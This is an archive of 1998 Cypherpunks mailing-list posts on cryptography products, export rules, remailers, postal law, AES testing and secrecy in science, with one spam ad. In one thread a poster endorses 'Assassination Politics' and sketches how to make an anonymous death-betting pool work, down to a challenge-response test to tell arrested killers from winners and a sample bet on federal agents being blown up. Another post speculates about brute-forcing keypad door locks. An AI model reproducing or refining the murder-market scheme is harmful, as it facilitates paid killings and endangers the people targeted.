itself  performs the functions of a certificate, just as a
normal handwritten  signature does.  The user usually does
not need to check a  document against a certificate to see if
it was signed by the "real"  John Doe.  Instead he normally
checks one document against other  documents stored in the
database that have the same signature. And similarly when he
encrypts a document, he does not need to  use a certificate
to encrypt a message to the one *real* John Doe,  he merely
encrypts a message to the *same* John Doe who signed  the
letter he is replying to.

At present people have to deal with certificate management  
problems regardless of whether they really need certificates. 
For example the most common usage of PGP is to check that two 
signatures that purport to be by the same person are in fact 
by the same person.   Unfortunately you cannot check one  
signature against another directly using PGP or any of the  
other existing products.  Instead you have to check both  
signatures against a public key certificate, even if the  
authentication information in that certificate is irrelevant 
to your purpose, which it usually is, which means that you  
have to download the certificate from somewhere, and the  
person signing it had to upload it somewhere.  As PGP always 
checks a document against the certificate, rather than
against  any other document the user happens to feel is
relevant to the  question, the person signing the document
needs to get his  certificate properly signed by some widely
trusted third party,  which is too much trouble or too
complicated for many people.

The signatures and contracts in Crypto Kong are optionally  
tolerant of email munging

The web pages contain a new web page "Business Vision" which 
discusses the widespread failure to adopt cryptography, the  
widespread reluctance to pay for cryptography, and the  
illiquidity of various products for transferring money on the 
net, and proposes a path to a solution.

Clearly, PGP has had rather poor penetration for business    
uses, and by and large, people only need to encrypt or sign  
stuff when there is money at stake.

I believe that this product will be more acceptable for  the 
typical businessman than PGP is, because it is easier to use, 
and existing business practices translate more  readily to   
the identity model it supports than does the PGP identity    
model.

The web page also contains full source code.

Crypto Kong is written in large part as ActiveX component, 
and the use interface and database management code is written 
in visual basic.

The use of ActiveX should make it easy to quickly code 
products and web page that perform tasks involving 
encryption.



    --digsig
         James A. Donald
     6YeGpsZR+nOTh/cGwvITnSR3TdzclVpR0+pr3YYQdkG
     AXOOTHyx0TpTLdyQsBnt7WmaVIo1l4WDGabHKK0Y
     4Bxm/YWIEOTOK6zRVH57lP7PENFT5OFN+IR39Fcx8







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Thu, 8 Jan 1998 14:54:14 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@cyberpass.net>
Subject: The hax0rz are at it again... check out www.unicef.org
Message-ID: <Pine.LNX.3.96.980108064845.260B-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain



Although I can't agree with their methods, I really love their motives.

In case they fix it sometime soon, go to:
http://bureau42.base.org/mirrors/ and click the "unicef" link.

dave





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 9 Jan 1998 02:25:19 +0800
To: cypherpunks@toad.com
Subject: MS Server Gated Crypto: strong encryption w/ exportable browsers if the server is US-OK
Message-ID: <3.0.5.32.19980108090210.007a6820@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



	
The jist of http://eu.microsoft.com/industry/finserv/m_finserv/m_fordev_g.htm
is, MS has US permission to export a DLL containing 128-bit SSL *worldwide*
since
the encryption is enabled IFF there's a Verisign "SGC certificate" on the
*server*.
This apparently will work with Netscape servers in addition to IIS.

This facilitates gov't-trusted banks doing business with clients with
generic MS browsers.
And it facilitates MS's growth in the web world.

Thoughts: 

Since US law (*) doesn't recognize digital IDs or the authority of
Verisign, this
implies the government has enforced some arbitrary judgement calls biassed
towards this system, no?
Additionally, the US would be seeming to trust the implementation in MS's
new DLL which
checks for and verifies signatures.  All in all, some clever/cunning
positioning by MS.

This is set up for banks, and the certificates are strong.  But they seem
like the weak
point --could a generic certificate be circulated amongst the Undesirables
so they
could enable this feature in IE browsers with the new DLL?


(*) I understand that the government of Utah now recognizes some form of
digital signatures.








------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 9 Jan 1998 02:38:30 +0800
To: Sergey Goldgaber <kent@songbird.com>
Subject: Re: Jim Bell... lives... on... in... Hollywood!
In-Reply-To: <19980101150542.36875@songbird.com>
Message-ID: <3.0.5.32.19980108092108.007c3b30@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 10:48 PM 1/7/98 -0800, Sergey Goldgaber wrote:
>On Thu, 1 Jan 1998, Kent Crispin wrote:
>
>> On Thu, Jan 01, 1998 at 09:52:20PM +1100, Julian Assange wrote:
>> > 
>> > Anyone noticed this before?
>> 
>> No.  But there are two obvious differences between this and the Bell 
>> plan:  1) it's not anon; 2) you are explicitly barred from winning if 
>> you contribute in any way to the death.
>
>1 - Anonymity is technically feasable.
>
>2 - This requirement is a legal necessity.  Otherwise, the organization
>    may be seen as advocating murder.
>
>Obviously, if the "Death Pool" was fully anonymous, there would be
>no way to tell if the winner had contributed in any way to the death.
>
>Thus, I think we may be well on our way to Assasination Politics.
>
> - Sergey Goldgaber

I agree, but "contribute to death" needs to be operationalized.  Here's a
proposal:
If a homicide suspect is arrested within N months, they will be isolated
from the net
and the owner of the winning ID will have to perform a challenge-response.
Since
the suspect couldn't have replied, they are different; if a pair
collaborated, well,
when a hit man is caught, his payoff matrix will usually make him turn in
the client.

The N-months might be a weakness since there is no expiration time on
homicide.
But in cases where cause of death is known and it can be proved that the
incarcerated is not the winner, it looks good.  E.g., a bet that "more than
two BATF agents will be blown up in 97" would be safely payable now that those
fellows with the short haircuts have been convicted.





------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 9 Jan 1998 02:34:45 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <53Zuie3w165w@bwalk.dm.com>
Message-ID: <3.0.5.32.19980108092357.007c64e0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 12:02 AM 1/8/98 -0800, Bill Stewart wrote:
>At 07:19 PM 1/5/98 EST, Dr.Dimitri Vulis KOTM wrote:
>>"Evolution in action."
>>Thank you, Michael Kennedy, for improving humanity's gene pool.
>
>It's only evolution in action if it gets them before they've reproduced...
>


No, if it gets them before they could have reproduced more, that's good too.
Also, if their absence hurts their existing spawn, that's selection as well.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 9 Jan 1998 02:44:25 +0800
To: Jim Gillogly <cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <md5:2F4707F94158BBCDE58F1FC30140DD96>
Message-ID: <3.0.5.32.19980108093331.007c6100@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 05:09 AM 1/8/98 -0800, Jim Gillogly wrote:
>Vladimir Z. Nuri wrote:
>> scientists who agree to government secrecy to develop
>> their inventions are agreeing to a lot more than
>> mere secrecy. they are committing to a paradigm that
>> is at odds with science itself, which only advances through
>> the open literature.
>
>Why limit your annoyance to government scientists?  Scientists
>in private industry are in the same position, developing (e.g.)
>algorithms and analytical methods protected by trade secrets.
>Society recognizes this tendency and tries to advance science
>anyway by offering patent protection.  You don't make money by
>giving away your intellectual capital.  Seems to me that schools
>and independently wealthy scientists/foundations are the only
>ones who don't merit your censure on this count.
>-- 


Nuri was obviously going through the angst of realizing responsibility
as a creative technologist.

You are adding antibusiness sentiments to this.

The fact is, you choose who/what you work on.  And face it, many government
scientists think they're wearing white hats.  As do those in industry and
academia, as well as the independant investigator.

The British scientist reporting on his discovery of PK was not *bitter* that 
others found it too.  He was explaining the secretive context of its
development in one closed shop.  He undoubtably thinks his work was Good.
It is only some readers who are thinking that the Brit is trying to usurp
something.  He's not.

I thought the Brit's explanation was helpful for understanding PK beyond the 
confusing complexity of the RSA-implementation of it.  It does not detract
from
the efforts (or patents) of anyone, that PK has been discovered multiple
times.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	"How do you know you are not being deceived?" 
	---A Compendium of Analytic TradeCraft Notes, 
	Directorate of Intelligence, CIA
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 9 Jan 1998 03:05:23 +0800
To: David Honig <honig@otc.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <md5:A52E9F3E65E573E5291BCCD6ECEE487E>
Message-ID: <34B5111C.7129@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:
> At 05:09 AM 1/8/98 -0800, Jim Gillogly wrote:
> >Vladimir Z. Nuri wrote:
> >> scientists who agree to government secrecy to develop
> >> their inventions are agreeing to a lot more than
> >> mere secrecy. they are committing to a paradigm that
> >> is at odds with science itself, which only advances through
> >> the open literature.
> >
> >Why limit your annoyance to government scientists?  Scientists
> >in private industry are in the same position, developing (e.g.)
> 
> Nuri was obviously going through the angst of realizing responsibility
> as a creative technologist.
> 
> You are adding antibusiness sentiments to this.
> 
> The fact is, you choose who/what you work on.  

I'm not adding antibusiness sentiments -- I'm questioning why the
Vladster limited his angst to government.  I did, in fact, choose
to work in private industry, and I'm not opposed to inventors
reaping the rewards of their brain power -- and that goes for the
inventors of public keys and RSA, who I feel earned their rewards.
-- 
	Jim Gillogly
	Trewesday, 17 Afteryule S.R. 1998, 17:43
	12.19.4.14.17, 1 Caban 15 Kankin, Ninth Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 9 Jan 1998 03:01:54 +0800
To: cypherpunks@cyberpass.net
Subject: Journalism and the Internet conference at Freedom Forum
Message-ID: <Pine.GSO.3.95.980108095459.10517F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 09:53:34 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Journalism and the Internet conference at Freedom Forum

[I'm on the "Online journalism, governments and the First Amendment" 
panel tomorrow. I expect rating systems will come up. --Declan]


---------- Forwarded message ----------
Date: Thu, 08 Jan 1998 10:48:22 -0500
From: Adam Powell <apowell@freedomforum.org>
Subject: Journalism/Internet conf webcast

Tomorrow's "Journalism and the Internet" conference will be webcast 
in its entirety, so those who cannot join us in person will be able 
to join sessions on line. Webcast listeners will also be able to 
submit questions and comments via e-mail for panelists during the webcast.

Below is the schedule (all times EST):

"Journalism and the Internet" conference
Rooftop Conference Center
The Freedom Forum
1101 Wilson Boulevard
Arlington, Virginia 22209

8:30 a.m. -- Welcome and introduction
Charles Overby, The Freedom Forum; Richard Sammon, National Press Club
9 a.m. -- Keynote address
Speaker: Steve Case, America Online
Moderator: Adam Powell
9:45 a.m. -- "Where are we/How did we get here?"
Panelists: Llewellyn King, King Publishing; Sam Meddis, USA TODAY; Stephen 
Miller, The New York Times; Marc Weiss, Web Development Fund
Moderator: Don Brown, QRadio
11 a.m. -- "Standards and ethics online"
Panelists: Rajiv Chandrasekaran, The Washington Post; Steven Levy, 
Newsweek; John Markoff, The New York Times; Jai Singh, CNET
Moderator: Lee Thornton, University of Maryland
12:30 p.m. -- Luncheon program -- "Sports journalism online: Special case 
or leading edge?"
Welcome: Peter Prichard, The Freedom Forum
Speaker: John Rawlings, The Sporting News
Moderator: Gene Policinski, The Freedom Forum
2:15 p.m. -- "Online journalism, governments and the First Amendment"
Panelists: Donna Demac, Georgetown University; Mike Godwin, Electronic 
Frontier Foundation; Declan McCullagh, Netly News/Time magazine; Lynn 
Povich, MSNBC
Moderator: Paul McMasters, The Freedom Forum
4 p.m. -- "Politics '98 online"
Panelists: Farai Chideya, ABC News; Kathleen deLaski, America Online; Mike 
Riley, CNN/Time's AllPolitics; Omar Wasow, MSNBC
Moderator: Robert Merry, Congressional Quarterly

Newseum Broadcast Studio
The Newseum
1101 Wilson Boulevard
Arlington, Virginia 22209

1 p.m. -- "Journalism and the Internet" public program
Journalist of the Day: John Markoff, The New York Times

***

We will also have live webcasts of the Saturday programs:

Newseum Broadcast Studio
The Newseum
1101 Wilson Boulevard
Arlington, Virginia 22209

1 p.m. -- "Journalism and the Internet" public program
Journalist of the Day: Jai Singh, CNET

2:30 p.m. -- "Journalism and the Internet" public program
Technology demonstration: 
John Pavlik, Center for New Media, Columbia University
Discussion:
Benjamin Davis, MSNBC
Steve Geimann, Society of Professional Journalists
Lisa Napoli, New York Times

***

Adam Clayton Powell, III
Vice President, Technology and Programs, The Freedom Forum
703-284-3553 fax 703-284-2879
apowell@freedomforum.org
apowell@alum.mit.edu
http://www.freedomforum.org/technology/welcome.asp











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Sparkes <isparkes@q9f47.dmst02.telekom.de>
Date: Thu, 8 Jan 1998 17:07:52 +0800
To: Adam Back <billp@nmol.com
Subject: Re: brute forcing combination locks (Re: Bruce Schneier, Sandia, FBI and the REAL WORLD)
In-Reply-To: <34B3DFB4.6396@nmol.com>
Message-ID: <3.0.2.32.19980108100339.00722fc8@q9f47.dmst02.telekom.de>
MIME-Version: 1.0
Content-Type: text/plain



>So I hacked up some code to compute the minimal universal door entry
>sequence number...
>
>The sequence looked something like this:
>
>01234567890124568902346780...

We have the same system at my [x], and I have played with the same idea
coming up with similar results (my value was somewhat lower - but this was
fag packet maths and therefore subject to error). In my fantasies I have
also connected this sequence to an array of solenoids which punch in the
number while you wait. The locks seem to be able to handle a throughput of
around 2 digits per second, meaning the average search time of 10 minutes.
Bear in mind that there are 8 of these locks - with the appropriate
hardware you could guarantee to be in in less than three mins.

The reason that this has remained in my fantasies is that any key changes
are predictable - the company is the (until last Wednesday) state owned
telephone company =) and the keyspace consists of the area codes for the
surrounding regions.

And this lock is the only thing that stands between the outside world and
25 Servers and 300 workstations.

Makes you think...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 8 Jan 1998 17:23:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anonymous Remailers
In-Reply-To: <v0400390bb0d6d383f9b3@[139.167.130.248]>
Message-ID: <199801080918.KAA28931@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain







On Mon, 5 Jan 1998, Robert Hettinga wrote:

> 
> > I noticed on Apple's info about acceptable behavior on their lists, that
> 
> I decided to stop accepting posts from anonymous remailers way back,
> when anon.penet.fi was still alive. Some of that is philosophy, some of
> that was problems.
> 
> As far as problems, it's the normal stuff -- personal attacks,
> mailbombing through anonymous remailers, copyright/slander/libel
> issues, all the normal fun and games. Since you can't track users back,
> you have real problems policing them. And since anonymous remailers
> tend to allow multiple (heading towards infinite) remailing addresses,
> the practical issue of how to lock out an abusive user becomes severe.
Mailbombing could be a criminal offence.
But libel is a civil and not a criminaloffence.
Under The Communications Decency Act S.230(a) no service provider is 
liable for content authored by others.
Even if someone use a remailer to  slander and libel further action 
requires private civil action.
There is absolute no reason for being concerned about defamation from the 
operator point of view.
The Fourth Circuit Court upheld the service provider impunity defence in 
a recent case
brought against American Online Inc. (Zeran v. American Online Inc.).
However,if a moderator vulunterable approves a libelous message the case 
could be different.
BTW, am I correct that criminal libel in no longer considered constitutional?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Jan 1998 03:39:58 +0800
To: Jim Gillogly <cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <md5:2F4707F94158BBCDE58F1FC30140DD96>
Message-ID: <v03102800b0dac9cd1f90@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:09 AM -0800 1/8/98, Jim Gillogly wrote:
>Vladimir Z. Nuri wrote:
>> scientists who agree to government secrecy to develop
>> their inventions are agreeing to a lot more than
>> mere secrecy. they are committing to a paradigm that
>> is at odds with science itself, which only advances through
>> the open literature.
>
>Why limit your annoyance to government scientists?  Scientists
>in private industry are in the same position, developing (e.g.)
>algorithms and analytical methods protected by trade secrets.
>Society recognizes this tendency and tries to advance science
>anyway by offering patent protection.  You don't make money by
>giving away your intellectual capital.  Seems to me that schools
>and independently wealthy scientists/foundations are the only
>ones who don't merit your censure on this count.

Scientists even in schools and foundations are often secretive, too.

The notion that "science" is about blabbing one's latest discoveries or
theories is overly simplistic. Many scholars and scientists choose not to
publicize their work for years, or decades, or, even, never.

Consider Andrew Wiles, Princeton math professor, and the prover of Fermat's
Last Theorem. He labored in secrecy for many years, only going public when
he felt his results were complete. (As it turned out, they were not, and he
needed another year or two to fill in some gaps.)

Corporate scientists now outnumber academic or foundation scientists, and
they are quite understandably under various restrictions to keep results
secret, at least for a while.

Science does not "only advance through the open literature." There are many
other checks and balances which accomplish the same effect. I could give
dozens of examples of where the open literature either did not exist or was
not used...and science still advanced.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Thu, 8 Jan 1998 23:53:29 +0800
To: "Robert A. Costner" <pooh@efga.org>
Subject: Re: Question on U.S. Postal Service and crypto
In-Reply-To: <3.0.3.32.19980108035645.037abe0c@mail.atl.bellsouth.net>
Message-ID: <34B51EC8.2489@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Robert A. Costner wrote:

> A few months back I asked a USPS rep about this, and was told that the idea
> had been scrapped.  I do not know that this was correct.  The USPS was
> going to do timestamping as well as act as a CA as I recall.  The
> timestamping is a action that "postmarks" the digitally signed message.
> Many attorneys feel this is a very good thing, though I have had a hard
> time justifying the need for this to some technically inclined people.

I have it on good authority that either the plan has been scrapped or that
it has simply gone nowhere (same result).
 
> An interesting feature of the digital postmark is that the USPS was making
> the claim that if you receive an email that the USPS send to you that was
> not meant for you, then you have committed a federal crime when you read it.

I'm not so sure about this, Robert.  I've heard the rumor that it is a crime,
but I have also heard that if something is delivered to your box, it is yours
and you are not required to send it back unopened if it is not addressed to
you.  I tend to believe the latter, as it is the side of the story shared by
USPS employees.

It certainly is a federal crime, however, for the indended recipient to get
into your mailbox to get a message which was incorrectly delivered to you,
however!

--David Miller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Franks <>
Date: Fri, 9 Jan 1998 04:15:48 +0800
To: <Cypherpunks@toad.com>
Subject: Search Engines
Message-ID: <199801081853.KAA26269@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I saw your listing on the internet.
Get your web site(s) submitted to over 250 of the worlds best
search engines for only $39.95!  (Yahoo, Lycos, AOL, Excite,
Hotbot, Linkstar, Webcrawler, and hundreds others).

A professional will view your site and put together a list
of the best key words and submit your site:  mailing you
the computer print out of ALL the search engines your
site(s) were submitted to. (you should have in 5-10 days)

To put your web site in the fast lane and receive more
traffic, mail your check for only $39.95 to NetWorld at
the below address.  To start your submission today, fax
a copy of the check you are mailing to (760) 639-3551
and be SURE to include BOTH the web site address
and email address for each site you are having submitted.
This is a one time fee.

Mail Checks to NetWorld PO Box 326 Oceanside, CA. 92049


Sincerely,

Brian Franks
NetWorld
http://www.max2001isp.com/networld/submit.htm 
(800) 484-2621 X5568






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 9 Jan 1998 04:43:29 +0800
To: cypherpunks@toad.com
Subject: FWD: AES Update - Known Answer Tests, Monte Carlo Tests, syntax,  and formats
Message-ID: <3.0.5.32.19980108111305.0088ba60@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>X-Sender: foti@csmes.ncsl.nist.gov
>Date: Wed, 07 Jan 1998 16:41:40 -0500
>To: smid@csmes.ncsl.nist.gov
>From: Jim Foti <jfoti@nist.gov>
>Subject: AES Update - Known Answer Tests, Monte Carlo Tests, syntax,
>  and formats
>
>Folks,
>
>A Happy New Year to you all!  1998 should be quite exciting and hectic for
>all of us involved in the AES development effort.
>
>Here is the latest news regarding AES.  I have just posted Known Answer
>Test and Monte Carlo Test documentation on our AES home page.  The actual
>link is:  <http://csrc.nist.gov/encryption/aes/katmct/katmct.htm>.
>
>Information on the API should be made available within several weeks - we
>are actively and diligently working on that.  When that information is
>posted, I will send you a notification message similar to this one.
>
>In addition, we will soon have a survey for you which will be used to
>expedite the exportability of AES analysis packages (which will be made
>available when we announce the "complete and proper" submissions later this
>summer).  More information to follow soon.
>
>As with past messages, this is being sent to all persons who have expressed
>an interest in the AES development effort (one way or another) within the
>last year. 
>
>Kindest regards,
>Jim
>
>
>
>*******************************************************************
>Jim Foti
>
>Security Technology Group
>Computer Security Division
>National Institute of Standard and Technology (NIST)
>
>TEL: (301) 975-5237
>FAX: (301) 948-1233
>
>*******************************************************************
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 02:37:38 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Question on U.S. Postal Service and crypto (fwd)
Message-ID: <199801081753.LAA03063@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 08 Jan 1998 10:45:28 -0800
> From: David Miller <dm0@avana.net>
> Subject: Re: Question on U.S. Postal Service and crypto

> I'm not so sure about this, Robert.  I've heard the rumor that it is a crime,
> but I have also heard that if something is delivered to your box, it is yours
> and you are not required to send it back unopened if it is not addressed to
> you.  I tend to believe the latter, as it is the side of the story shared by
> USPS employees.

The way it works is if a company send you (ie addressed to you or your
physical address) and *then* attempts to recoup costs for the product or item
delivered *and* you did not request the item *then* it is yours. It must be
either addressed to you or the occupant of that delivery address, it is
important to note that the test in all this is whether you requested
something from the company. If the item is specificaly addressed to a 3rd
party it is a crime to open it. I haven't looked into what the requirements
for re-delivery are, as far as I am aware you could either return it to the
post office for dead-letter filing or dump it in the trash.
 
> It certainly is a federal crime, however, for the indended recipient to get
> into your mailbox to get a message which was incorrectly delivered to you,
> however!

Technicaly, it is a crime for *you* to put stuff in your mailbox. When the
home pick-up was eliminated a few years ago (supposedly because of the drug
and bomb threat) the mailbox on your house or in your apartment was turned
into an *exclusive* delivery point for the USPS. When you or I ask somebody
to drop it in the box because we are not home we are technicaly committing a
crime.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "S. M. Halloran" <mitch@duzen.com.tr>
Date: Thu, 8 Jan 1998 18:21:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anonymous Remailers
In-Reply-To: <v0400390bb0d6d383f9b3@[139.167.130.248]>
Message-ID: <199801081014.MAA06679@ankara.duzen.com.tr>
MIME-Version: 1.0
Content-Type: text/plain



On  8 Jan 98, Anonymous was found to have commented thusly:

> On Mon, 5 Jan 1998, Robert Hettinga wrote:
> 
> > > I noticed on Apple's info about acceptable behavior on their lists, that
> > 
> > I decided to stop accepting posts from anonymous remailers way back,
> > when anon.penet.fi was still alive. Some of that is philosophy, some of
> > that was problems.
> > 
> > As far as problems, it's the normal stuff -- personal attacks,
> > mailbombing through anonymous remailers, copyright/slander/libel
> > issues, all the normal fun and games. Since you can't track users back,
> > you have real problems policing them. And since anonymous remailers
> > tend to allow multiple (heading towards infinite) remailing addresses,
> > the practical issue of how to lock out an abusive user becomes severe.
> Mailbombing could be a criminal offence.
> But libel is a civil and not a criminaloffence.
> Under The Communications Decency Act S.230(a) no service provider is 
> liable for content authored by others.
> Even if someone use a remailer to  slander and libel further action 
> requires private civil action.
> There is absolute no reason for being concerned about defamation from the 
> operator point of view.
> The Fourth Circuit Court upheld the service provider impunity defence in 
> a recent case
> brought against American Online Inc. (Zeran v. American Online Inc.).
> However,if a moderator vulunterable approves a libelous message the case 
> could be different.
> BTW, am I correct that criminal libel in no longer considered constitutional?
 
Depends on whose constitution you are reading.

In the country where I reside, the politicians use libel laws to 
avoid accountability to the voting public and to get at 
journalists with both civil and, I am pretty sure, criminal 
penalties.  Journalism is a job with rather unusual occupational 
hazards in this particular country, in fact, with the largest number 
of murders of journalists taking place here, often by the police or 
some 'civil authority', who are rather brazen about it and 
characterize any journalist not in the pocket as a sympathizer of a 
cause for which the public is willing to do a lynching.  (The 
military, which operates its own 'state security' court system here, 
just throws them in the lockup until they find a way to escape.)  Sam 
Donaldson would have been history long ago here.

Mitch Halloran
Research (Bio)chemist
Duzen Laboratories Group
Ankara   TURKEY
mitch@duzen.com.tr

other job title:  Sequoia's (dob 12-20-95) daddy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Jan 1998 05:44:43 +0800
To: David Miller <dm0@avana.net>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <md5:2F4707F94158BBCDE58F1FC30140DD96>
Message-ID: <v03102802b0dae7ad24a3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:26 PM -0800 1/8/98, David Miller wrote:
>Tim May wrote:
>
>> Consider Andrew Wiles, Princeton math professor, and the prover of Fermat's
>> Last Theorem. He labored in secrecy for many years, only going public when
>> he felt his results were complete. (As it turned out, they were not, and he
>> needed another year or two to fill in some gaps.)
>
>You may have seen the same TV show I saw on him.  I really enjoyed it.

No, I didn't get my information from television. I presume you mean the
"Nova" show some months back.

>Is there any evidence that he got (ahem) outside funding for his project?
>In the back of my paranoid mind, I wondered that since he was dealing with
>elliptic curves and modular arithmetic if...  I mean, how did he pay his
>mortgage?  The show implied that he was not doing any real teaching most
>of that time, and if no one at the school knew of his work, then where was
>the money coming from?

Why don't you use the Web and report what you find? I'm not inclined to go
out and do this research to answer your questions.

(I just found 800 hits on his name, including biographical material.)

If, by the way, you are surmising that he may've received NSA funding, this
seems dubious. Just because "elliptic functions" are involved....

In any case, his salary was paid by Princeton for most or all of those
years. As he had no equipment to buy, no students to support...his costs
were low.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Jan 1998 05:50:42 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Remailers & N.E.T.
In-Reply-To: <2257f75e9d4378c573ebe49c9a1d7acc@anon.efga.org>
Message-ID: <v03102803b0daeb29f609@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




[A reminder: people continue to use the "cypherpunks@toad.com" address.
Please start using one of the real addresses!]

At 9:46 PM -0800 1/7/98, Robert A. Costner wrote:
>Perhaps the use of a remailer for this message below is an attempt to
>escape the criminal provisions of the No Electronic Theft Act.
>
>>From: Anonymous <anon@anon.efga.org>

Yep, expect a lot more of this.

As the Copyright Police descend on more "violators" of the NETA, more folks
will realize the remailers are their best protection.

(Though the SPA and others may then go after the remailers. Ironically, the
CDA exempted remailers--though not by name--from liability for messages.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@McGlashan.com>
Date: Fri, 9 Jan 1998 05:26:58 +0800
To: Simon Spero <bill.stewart@pobox.com>
Subject: Re: How about a Bay Area Cypherpunks meeting 1/17/98?
Message-ID: <199801082007.MAA29096@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain



At 11:03 PM 12/20/97 -0500, Simon Spero wrote:
>On Sat, 20 Dec 1997, Bill Stewart wrote:
>
>The 17th also happens to be just after a W3C meeting in Palo Alto. I was
>planning to spend the day hanging at the mall with Chelsea, but this could
>be fun too...

I'm sorry, I won't be available on January 17th.

Cindy
************************ 
Cindy A. Cohn                                                               
McGlashan & Sarrail, P. C.
177 Bovet Road, 6th Floor                                            
San Mateo, CA  94402
(650) 341-2585 (tel)
